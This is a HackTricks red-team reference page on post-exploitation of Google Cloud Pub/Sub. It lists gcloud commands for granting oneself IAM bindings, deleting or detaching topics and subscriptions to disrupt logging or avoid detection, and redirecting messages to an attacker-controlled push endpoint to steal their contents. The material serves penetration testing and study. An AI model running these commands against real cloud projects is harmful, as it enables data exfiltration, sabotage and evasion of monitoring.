GCP - Pub/Sub Post Exploitation

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Pub/Sub

For more information about Pub/Sub check the following page:

GCP - Pub/Sub Enum

`pubsub.topics.publish`

Publish a message in a topic, useful to send unexpected data and trigger unexpected functionalities or exploit vulnerabilities:

Publish message to topic

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

`pubsub.topics.detachSubscription`

Useful to prevent a subscription from receiving messages, maybe to avoid detection.

Detach subscription from topic

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

`pubsub.topics.delete`

Useful to prevent a subscription from receiving messages, maybe to avoid detection.
It’s possible to delete a topic even with subscriptions attached to it.

Delete topic

gcloud pubsub topics delete <TOPIC NAME>

Use this permission to update some setting of the topic to disrupt it, like --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key…

`pubsub.topics.setIamPolicy`

Give yourself permission to perform any of the previous attacks.

# Add Binding
gcloud pubsub topics add-iam-policy-binding <TOPIC_NAME> \
  --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
  --role="<ROLE_OR_CUSTOM_ROLE>" \
  --project="<PROJECT_ID>"

# Remove Binding
gcloud pubsub topics remove-iam-policy-binding <TOPIC_NAME> \
  --member="serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com" \
  --role="<ROLE_OR_CUSTOM_ROLE>" \
  --project="<PROJECT_ID>"
  
# Change Policy
gcloud pubsub topics set-iam-policy <TOPIC_NAME> \
  <(echo '{
    "bindings": [
      {
        "role": "<ROLE_OR_CUSTOM_ROLE>",
        "members": [
          "serviceAccount:<SA_NAME>@<PROJECT_ID>.iam.gserviceaccount.com"
        ]
      }
    ]
  }') \
  --project=<PROJECT_ID>

`pubsub.subscriptions.create,``pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)

Get all the messages in a web server:

Create push subscription to receive messages

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Create a subscription and use it to pull messages:

Create pull subscription and retrieve messages

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

`pubsub.subscriptions.delete`

Delete a subscription could be useful to disrupt a log processing system or something similar:

Delete subscription

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

`pubsub.subscriptions.update`

Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.

Update subscription endpoint

gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>

`pubsub.subscriptions.setIamPolicy`

Give yourself the permissions needed to perform any of the previously commented attacks.

`pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)

Attack a schema to a topic so the messages doesn’t fulfil it and therefore the topic is disrupted.
If there aren’t any schemas you might need to create one.

Create schema file and attach to topic

{
  "namespace": "com.example",
  "type": "record",
  "name": "Person",
  "fields": [
    {
      "name": "name",
      "type": "string"
    },
    {
      "name": "age",
      "type": "int"
    }
  ]
}

# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
    --schema=projects/<project-name>/schemas/<topic-id> \
    --message-encoding=json

`pubsub.schemas.delete`

This might look like deleting a schema you will be able to send messages that doesn’t fulfil with the schema. However, as the schema will be deleted no message will actually enter inside the topic. So this is USELESS:

Delete schema (not useful)

gcloud pubsub schemas delete <SCHEMA NAME>

`pubsub.schemas.setIamPolicy`

Give yourself the permissions needed to perform any of the previously commented attacks.

`pubsub.snapshots.create`, `pubsub.snapshots.seek`

This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it’s:

Create snapshot and seek to it

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
    --subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
    --snapshot=YOUR_SNAPSHOT_NAME

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Check the subscription plans!

Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.

Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.